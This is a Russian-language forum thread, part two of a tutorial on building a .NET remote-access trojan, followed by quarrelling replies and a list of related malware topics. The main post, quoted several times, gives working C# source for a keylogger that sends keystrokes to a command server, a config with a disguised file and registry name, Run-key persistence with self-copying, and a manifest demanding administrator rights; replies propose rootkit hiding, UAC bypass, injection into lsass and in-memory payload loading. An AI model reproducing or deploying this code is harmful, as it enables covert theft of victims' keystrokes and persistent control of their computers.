Ualm - rat [Пишем свой rat на .net] | Часть #2

Enl0ck · 8 дек 2018

Удалено, спасибо arkadyYT.

Enl0ck · 8 дек 2018

В следующей теме, на меня будет небольшой деанон, ждите)

arkadyYT · 8 дек 2018

Enl0ck В части #1, мы писали основу для бота, сегодня мы напишем ещё несколько достаточно важных функций, а в следующей теме мы скорее всего напишем логику!

Думаю многие уже догадались что софт в полной версии у меня уже есть, а я просто рву исходы, так что я хочу вам показать что у меня уже есть, надеюсь это накинет вам мотивацию писать софт самим:

Как мы видим, тут уже прилично написано, хотя я ещё и работаю над логикой.
Кстати, мне как-то говорили что Keylogger на .NET'е писать сложно, нихуя подобного.
С этого мы и начнём!
int KeyCount = 0;
string log = null;
while (Config.KeyLogger)
{
Thread.Sleep(100);
for (int i = 0; i < 255; i++)
{
int keyState = GetAsyncKeyState(i);
if (keyState == 1 || keyState == -32767)
{
log = log + (Keys)i + ", ";
KeyCount++;
if (KeyCount == Config.Keylogger_PushBeforeSending)
{
HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");
KeyCount = 0;
}
else { }
}
}
}

Код
int KeyCount = 0;

string log = null;

                while (Config.KeyLogger)

                {

                    Thread.Sleep(100);

                    for (int i = 0; i < 255; i++)

                    {

                        int keyState = GetAsyncKeyState(i);

                        if (keyState == 1 || keyState == -32767)

                        {

                            log = log + (Keys)i + ", ";

                            KeyCount++;

                            if (KeyCount == Config.Keylogger_PushBeforeSending)

                            {

                                HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");

                                KeyCount = 0;

                            }

                            else { }

                        }

                    }

                }
Всего 20 строчек вместе с отправкой! Кстати, вы тут увидели такой класс как Config, прямо сейчас мы и напишем его, хотя писать там нечего.
public class Config
{
//- Server -//
public const string SAddr = "http://host.xyz";
public const string SKey = "root";

//- Client -//
public const string CacheDir = "C:\\";
public const string FileName = "bfsvc.exe";
public const string RegistryName = "Kernel";

//- Module Status -//
public static bool KeyLogger = false;
public static int Keylogger_PushBeforeSending = 0;
}

Код
public class Config

    {

        //- Server -//

        public const string SAddr = "http://host.xyz";

        public const string SKey = "root";



        //- Client -//

        public const string CacheDir = "C:\\";

        public const string FileName = "bfsvc.exe";

        public const string RegistryName = "Kernel";



        //- Module Status -//

        public static bool KeyLogger = false;

        public static int Keylogger_PushBeforeSending = 0;

    }
Кстати, тут вы уже спалили CacheDir и FileName, а ещё RegistryName, вот именно они нужны классу Persistence:
class Persistence
{
public static void fixation(bool pointer, string regname, string path)
{
if (pointer)
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.SetValue(regname, path);
reg.Close();
}
else
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.DeleteValue(regname);
reg.Close();
}
}

public static void migrate(string path)
{
File.Copy(Assembly.GetExecutingAssembly().Location, path);
Process.Start(path);
Environment.Exit(0);
}

public static bool inSystem()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
if (reg.GetValue(Config.RegistryName) != null)
{
return true;
}
else { return false; }
}

public static string readReg()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
string result = reg.GetValue(Config.RegistryName).ToString();
return result;
}
}

Код
class Persistence

    {

        public static void fixation(bool pointer, string regname, string path)

        {

            if (pointer)

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.SetValue(regname, path);

                reg.Close();

            }

            else

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.DeleteValue(regname);

                reg.Close();

            }

        }



        public static void migrate(string path)

        {

            File.Copy(Assembly.GetExecutingAssembly().Location, path);

            Process.Start(path);

            Environment.Exit(0);

        }



        public static bool inSystem()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            if (reg.GetValue(Config.RegistryName) != null)

            {

                return true;

            }

            else { return false; }

        }



        public static string readReg()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            string result = reg.GetValue(Config.RegistryName).ToString();

            return result;

        }

    }
Тут почти всё работает с реестром, а как знает любой кулхацкер, для доступа к нему нужны права администратора!
Я ещё не настолько кулхацкер что-бы поднимать их вручную, так что, давайте просто заставим юзера запускать софт с правами админа, для этого нужно добавить в проект такую штуку как манифест!

А туда ***** следующую дичь:
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>

<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
</assembly>

Код
<?xml version="1.0" encoding="utf-8"?>

<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">

  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">

    <security>

      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">

        <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

      </requestedPrivileges>

    </security>

  </trustInfo>



  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

    <application>

    </application>

  </compatibility>

</assembly>
Вот и всё, последнею плюшку докину вам в следующей теме, вам понравиться)))
А пока, я говорю вам: "До встречи".
Нажмите, чтобы раскрыть...
рассказывал бы хоть что за вещи делаешь а не 'такая дичь', к примеру в конце манифест файла.. а так лучше сделай клиент под njrat на C++

arkadyYT · 8 дек 2018

Enl0ck В части #1, мы писали основу для бота, сегодня мы напишем ещё несколько достаточно важных функций, а в следующей теме мы скорее всего напишем логику!

Думаю многие уже догадались что софт в полной версии у меня уже есть, а я просто рву исходы, так что я хочу вам показать что у меня уже есть, надеюсь это накинет вам мотивацию писать софт самим:

Как мы видим, тут уже прилично написано, хотя я ещё и работаю над логикой.
Кстати, мне как-то говорили что Keylogger на .NET'е писать сложно, нихуя подобного.
С этого мы и начнём!
int KeyCount = 0;
string log = null;
while (Config.KeyLogger)
{
Thread.Sleep(100);
for (int i = 0; i < 255; i++)
{
int keyState = GetAsyncKeyState(i);
if (keyState == 1 || keyState == -32767)
{
log = log + (Keys)i + ", ";
KeyCount++;
if (KeyCount == Config.Keylogger_PushBeforeSending)
{
HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");
KeyCount = 0;
}
else { }
}
}
}

Код
int KeyCount = 0;

string log = null;

                while (Config.KeyLogger)

                {

                    Thread.Sleep(100);

                    for (int i = 0; i < 255; i++)

                    {

                        int keyState = GetAsyncKeyState(i);

                        if (keyState == 1 || keyState == -32767)

                        {

                            log = log + (Keys)i + ", ";

                            KeyCount++;

                            if (KeyCount == Config.Keylogger_PushBeforeSending)

                            {

                                HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");

                                KeyCount = 0;

                            }

                            else { }

                        }

                    }

                }
Всего 20 строчек вместе с отправкой! Кстати, вы тут увидели такой класс как Config, прямо сейчас мы и напишем его, хотя писать там нечего.
public class Config
{
//- Server -//
public const string SAddr = "http://host.xyz";
public const string SKey = "root";

//- Client -//
public const string CacheDir = "C:\\";
public const string FileName = "bfsvc.exe";
public const string RegistryName = "Kernel";

//- Module Status -//
public static bool KeyLogger = false;
public static int Keylogger_PushBeforeSending = 0;
}

Код
public class Config

    {

        //- Server -//

        public const string SAddr = "http://host.xyz";

        public const string SKey = "root";



        //- Client -//

        public const string CacheDir = "C:\\";

        public const string FileName = "bfsvc.exe";

        public const string RegistryName = "Kernel";



        //- Module Status -//

        public static bool KeyLogger = false;

        public static int Keylogger_PushBeforeSending = 0;

    }
Кстати, тут вы уже спалили CacheDir и FileName, а ещё RegistryName, вот именно они нужны классу Persistence:
class Persistence
{
public static void fixation(bool pointer, string regname, string path)
{
if (pointer)
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.SetValue(regname, path);
reg.Close();
}
else
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.DeleteValue(regname);
reg.Close();
}
}

public static void migrate(string path)
{
File.Copy(Assembly.GetExecutingAssembly().Location, path);
Process.Start(path);
Environment.Exit(0);
}

public static bool inSystem()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
if (reg.GetValue(Config.RegistryName) != null)
{
return true;
}
else { return false; }
}

public static string readReg()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
string result = reg.GetValue(Config.RegistryName).ToString();
return result;
}
}

Код
class Persistence

    {

        public static void fixation(bool pointer, string regname, string path)

        {

            if (pointer)

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.SetValue(regname, path);

                reg.Close();

            }

            else

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.DeleteValue(regname);

                reg.Close();

            }

        }



        public static void migrate(string path)

        {

            File.Copy(Assembly.GetExecutingAssembly().Location, path);

            Process.Start(path);

            Environment.Exit(0);

        }



        public static bool inSystem()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            if (reg.GetValue(Config.RegistryName) != null)

            {

                return true;

            }

            else { return false; }

        }



        public static string readReg()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            string result = reg.GetValue(Config.RegistryName).ToString();

            return result;

        }

    }
Тут почти всё работает с реестром, а как знает любой кулхацкер, для доступа к нему нужны права администратора!
Я ещё не настолько кулхацкер что-бы поднимать их вручную, так что, давайте просто заставим юзера запускать софт с правами админа, для этого нужно добавить в проект такую штуку как манифест!

А туда ***** следующую дичь:
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>

<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
</assembly>

Код
<?xml version="1.0" encoding="utf-8"?>

<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">

  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">

    <security>

      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">

        <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

      </requestedPrivileges>

    </security>

  </trustInfo>



  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

    <application>

    </application>

  </compatibility>

</assembly>
Вот и всё, последнею плюшку докину вам в следующей теме, вам понравиться)))
А пока, я говорю вам: "До встречи".
Нажмите, чтобы раскрыть...
Делал бы ключи реестра через NtApi чтобы они небыли видны в regedit, придумал бы какой нибудь руткит для скрытия процесса без драйвера инжектя в cmd taskmgr и regedit длл, обход юак замутил бы (у меня есть код на С++ который работает прекрасно на всех ос)

Enl0ck · 8 дек 2018

arkadyYT, Не люблю работать на С++, слишком муторно, а если подключать кастомныё библиотеки, то это как по мне зашквар...

Enl0ck · 8 дек 2018

arkadyYT, Ну бля, хорошо что ты у нас такой крутой, деанон преждевременно - мне 14, есть вопросы?

arkadyYT · 8 дек 2018

Enl0ck arkadyYT, Не люблю работать на С++, слишком муторно, а если подключать кастомныё библиотеки, то это как по мне зашквар...
Нажмите, чтобы раскрыть...

Чё там блять муторного? я тебя не прошу на ASM работать на прямую с памятью, в C++ есть такая замечательная вещь как WinAPI и stl который всё решают, а по либам можно компилить с /MT и будет у тебя всё норм (это если тебе нужны либы), там можно спокойно сделать инфект системной длл которая запускается и потом выгружается со стартом ос и с неё спокойно в lsass или svchost инжектить код, пошли блин говнокодеры-шарписты..

arkadyYT · 8 дек 2018

Enl0ck arkadyYT, Ну бля, хорошо что ты у нас такой крутой, деанон преждевременно - мне 14, есть вопросы?
Нажмите, чтобы раскрыть...

я сам то конечно не идеально пишу на плюсах и люблю шарпик, к примеру скомпилил длл на плюсах для выполнения команд с обходом UAC и использую из шарпа, но зачем заниматься такой фигнёй и делать посты показывая какой ты долбаёб что пишешь трояны на c#

arkadyYT · 8 дек 2018

Enl0ck В части #1, мы писали основу для бота, сегодня мы напишем ещё несколько достаточно важных функций, а в следующей теме мы скорее всего напишем логику!

Думаю многие уже догадались что софт в полной версии у меня уже есть, а я просто рву исходы, так что я хочу вам показать что у меня уже есть, надеюсь это накинет вам мотивацию писать софт самим:

Как мы видим, тут уже прилично написано, хотя я ещё и работаю над логикой.
Кстати, мне как-то говорили что Keylogger на .NET'е писать сложно, нихуя подобного.
С этого мы и начнём!
int KeyCount = 0;
string log = null;
while (Config.KeyLogger)
{
Thread.Sleep(100);
for (int i = 0; i < 255; i++)
{
int keyState = GetAsyncKeyState(i);
if (keyState == 1 || keyState == -32767)
{
log = log + (Keys)i + ", ";
KeyCount++;
if (KeyCount == Config.Keylogger_PushBeforeSending)
{
HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");
KeyCount = 0;
}
else { }
}
}
}

Код
int KeyCount = 0;

string log = null;

                while (Config.KeyLogger)

                {

                    Thread.Sleep(100);

                    for (int i = 0; i < 255; i++)

                    {

                        int keyState = GetAsyncKeyState(i);

                        if (keyState == 1 || keyState == -32767)

                        {

                            log = log + (Keys)i + ", ";

                            KeyCount++;

                            if (KeyCount == Config.Keylogger_PushBeforeSending)

                            {

                                HTTPSend.Info(log.Remove(log.Length - 2, 2) + ".");

                                KeyCount = 0;

                            }

                            else { }

                        }

                    }

                }
Всего 20 строчек вместе с отправкой! Кстати, вы тут увидели такой класс как Config, прямо сейчас мы и напишем его, хотя писать там нечего.
public class Config
{
//- Server -//
public const string SAddr = "http://host.xyz";
public const string SKey = "root";

//- Client -//
public const string CacheDir = "C:\\";
public const string FileName = "bfsvc.exe";
public const string RegistryName = "Kernel";

//- Module Status -//
public static bool KeyLogger = false;
public static int Keylogger_PushBeforeSending = 0;
}

Код
public class Config

    {

        //- Server -//

        public const string SAddr = "http://host.xyz";

        public const string SKey = "root";



        //- Client -//

        public const string CacheDir = "C:\\";

        public const string FileName = "bfsvc.exe";

        public const string RegistryName = "Kernel";



        //- Module Status -//

        public static bool KeyLogger = false;

        public static int Keylogger_PushBeforeSending = 0;

    }
Кстати, тут вы уже спалили CacheDir и FileName, а ещё RegistryName, вот именно они нужны классу Persistence:
class Persistence
{
public static void fixation(bool pointer, string regname, string path)
{
if (pointer)
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.SetValue(regname, path);
reg.Close();
}
else
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
reg.DeleteValue(regname);
reg.Close();
}
}

public static void migrate(string path)
{
File.Copy(Assembly.GetExecutingAssembly().Location, path);
Process.Start(path);
Environment.Exit(0);
}

public static bool inSystem()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
if (reg.GetValue(Config.RegistryName) != null)
{
return true;
}
else { return false; }
}

public static string readReg()
{
RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
string result = reg.GetValue(Config.RegistryName).ToString();
return result;
}
}

Код
class Persistence

    {

        public static void fixation(bool pointer, string regname, string path)

        {

            if (pointer)

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.SetValue(regname, path);

                reg.Close();

            }

            else

            {

                RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

                reg.DeleteValue(regname);

                reg.Close();

            }

        }



        public static void migrate(string path)

        {

            File.Copy(Assembly.GetExecutingAssembly().Location, path);

            Process.Start(path);

            Environment.Exit(0);

        }



        public static bool inSystem()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            if (reg.GetValue(Config.RegistryName) != null)

            {

                return true;

            }

            else { return false; }

        }



        public static string readReg()

        {

            RegistryKey reg = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

            string result = reg.GetValue(Config.RegistryName).ToString();

            return result;

        }

    }
Тут почти всё работает с реестром, а как знает любой кулхацкер, для доступа к нему нужны права администратора!
Я ещё не настолько кулхацкер что-бы поднимать их вручную, так что, давайте просто заставим юзера запускать софт с правами админа, для этого нужно добавить в проект такую штуку как манифест!

А туда ***** следующую дичь:
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>

<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
</application>
</compatibility>
</assembly>

Код
<?xml version="1.0" encoding="utf-8"?>

<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">

  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">

    <security>

      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">

        <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />

      </requestedPrivileges>

    </security>

  </trustInfo>



  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

    <application>

    </application>

  </compatibility>

</assembly>
Вот и всё, последнею плюшку докину вам в следующей теме, вам понравиться)))
А пока, я говорю вам: "До встречи".
Нажмите, чтобы раскрыть...
если так любишь шарп устрил бы веселье, записал бы исходный код в ресурсы и сделал бы проект который компилит всё это дело и запускает в памяти, компилинг можешь полиморфным сделать, или сделать софтинку которая будет расшифровывать как нибудь не стандартно (алгоритмы шифрования не пойдут, задроченая тема, я вот в картинку шифрую) твой бинарник и запускает в памяти (для .NET файлов Invoke)

Enl0ck · 9 дек 2018

arkadyYT, Я вижу ЧСВ у тебя выше нормы, мне блять 14, ну не могу я пока такое написать, если ты решил тут показать что ты такой пиздатый то вали нахуй, темы созданы чисто с интереса. Я вижу у тебя пристрастие к убиванию любой мотивации...

Вообще не круто делаешь...

Enl0ck · 9 дек 2018

arkadyYT, И да, пишу я на шарпах всего-то 3 месяца, меня никто не учил, код не копипастил...
Решил тут показать что у тебя пиписька больше? Так то ты не лучше маленького школо-дауна что кидает RMS своим друзьям майнкрафтерам, а потом орёт в голосину что взломал их...

arkadyYT · 9 дек 2018

Enl0ck arkadyYT, И да, пишу я на шарпах всего-то 3 месяца, меня никто не учил, код не копипастил...
Решил тут показать что у тебя пиписька больше? Так то ты не лучше маленького школо-дауна что кидает RMS своим друзьям майнкрафтерам, а потом орёт в голосину что взломал их...
Нажмите, чтобы раскрыть...

arkadyYT · 9 дек 2018

Enl0ck Удалено, спасибо arkadyYT.
Нажмите, чтобы раскрыть...

Можешь в тему оставить ссылку на паб рат на шарпе с гитхаба.

Enl0ck · 9 дек 2018

arkadyYT , Кинь в ТГ контакт, скину исходы...

Enl0ck · 9 дек 2018

arkadyYT, Или напиши мне.

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий *** с отправкой * в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

Ualm - rat [Пишем свой rat на .net] | Часть #2

Обходим смартскрин, хром алерт и антивирусы без смс и кредитов

Создаём свою подпись кода за десять минут

Как получить цифровую подпись кода?

Получаем чистый OXI Joiner без склеек с официального сайта.

Делаем несуществующий БОТА (RAT-ник) под iOS

Малвари: методы распространения, виды атак итд итп

Программа шпион для андроид (до 10го) Observer

Flipper Zero

Кто шарит насколько опасно?

Blank-Grabber

Powershell код в активации Windows и не только: как iex и iwr методы помогают "хакерам"

Как удалить ******* без сноса винды?

Как сделать рабочий ******* с отправкой ***** в дискорд.

ИИ может генерировать малварь, избегающую обнаружения в 88% случаев

Как получить доступ к ПК другого человека

Android Malware - VNC - AC Node

Серый экран в DCRat Remote desktop, что делать?

Android Malware - Seed Phrase ******* / OCR / - Source Code

Intezer - мощный инструмент для поиска скрытых угроз

Вирус кражи SMS на Adnroid - Описание проблемы, Пример проекта

Разбор старенького вируса Red Petya и другие семейства данного вируса

Делаем безопасный вебхук для отстука *******а в тг

Какой майнер можно подкачать человеку чтобы мне капали бабки?

Новый вирус постепенно захватывающий LOLZ

Ставим панельку кряка Редлайна за 5 минут

Многофункциональная Android RAT с веб-панелью, без портов.

Пишем ******* на Java

Python кейлоггер: как создать простейший мониторинг с защитой данных

Прячем вирус в картинку •_• | Всем удачи

Вирусология (интересно почитать)

Ualm - rat [Пишем свой rat на .net] | Часть #2

Как сделать рабочий *** с отправкой * в дискорд.